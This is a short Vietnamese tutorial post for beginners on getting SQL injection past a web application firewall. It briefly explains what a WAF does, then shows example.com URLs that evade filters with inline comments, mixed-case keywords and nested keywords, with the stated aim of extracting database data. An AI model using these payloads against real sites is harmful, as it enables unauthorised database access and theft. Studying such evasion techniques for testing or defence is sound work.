Skip to main content

SQLi Bypass WAF (Web Application Firewall)

Trong bài viết này mình giới thiệu một số cách để Bypass qua WAF, cách này có thể có rất nhiều người đã biết nhưng mình Post lên đây cho những ai cần, đặc biệt là Newbie.

Trước khi đi vào tìm hiểu cách bypass thì ta sẽ đi tìm hiểu xem WAF là gì.

WAF là viết tắt của Web Application Firewall, Admin sử dụng Web Application Firewall nhằm để ngăn chặn các cuộc tấn công như SQLi và XSS. WAF phát hiện các cuộc tấn công nguy hiểm với việc sử dụng các bộ lọc dựa trên chữ ký và định nghĩa trong một danh sách các quy tắc.

Cách thức hoạt động

Khi WAF dò tìm được Malicous thử tất công vào thì nó sẽ đưa ra URL với lỗi là Forbidden.



Mục đích của chúng ta là để bỏ qua lỗi này và cần phải lấy dữ liệu từ cơ sở dữ liệu bằng cách sử dụng một số kỹ thuật đặc biệt. Có rất nhiều phương pháp để Bypass WAF. Trong hướng dẫn này, tôi sẽ chỉ cho bạn một số phương pháp cơ bản. Những phương pháp này đặc biệt có ích là cho người mới bắt đầu.

Phương pháp để Bypass WAF

Sử dụng Comments:-

Comment cho phép Bypass qua rất nhiều hạn chế Web application firewalls để thực hiện các lệnh tấn công trong khi đưa ra các truy vấn hợp pháp.

Query thông thường


Code:
http://example.com/detail.php?id=44 union all select 1,2,3,4,5—


Bypass WAF

Code:
http://example.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—


Sử dụng chữ viết hoa của các hàm:

Thỉnh thoảng, cần phải Bypass bằng cách viết hoa một số ký tự các hàm

Query thông thường.

Code:
http://example.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query ByPass WAF

Code:
http://example.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Thay thế từ keyword

Đôi khi lại cần phải thay thế từ khoá như UNION, SELECT, ORDER BY

Query thông thường
Code:
http://example.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query Bypass WAF

Code:
http://example.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
Hy vọng các bro đừng chém nhé, nếu có chém thì chém nhẹ tay 1 chút .

Share this with your friends
Loading...